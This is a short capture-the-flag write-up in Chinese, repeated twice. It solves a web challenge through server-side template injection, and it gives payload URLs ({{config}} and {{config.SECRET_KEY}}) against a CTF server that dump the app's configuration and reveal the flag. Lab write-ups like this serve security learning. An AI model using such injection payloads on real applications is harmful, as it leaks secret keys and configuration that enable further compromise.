题目:
进入页面先按F12
有个提示secret_key
考虑模板注入
输入url:
http://114.67.175.224:10472/?flag={{config}}
直接找到了flag
如果访问
http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}
可以直接显示flag
题目:
进入页面先按F12
有个提示secret_key
考虑模板注入
输入url:
http://114.67.175.224:10472/?flag={{config}}
直接找到了flag
如果访问
http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}
可以直接显示flag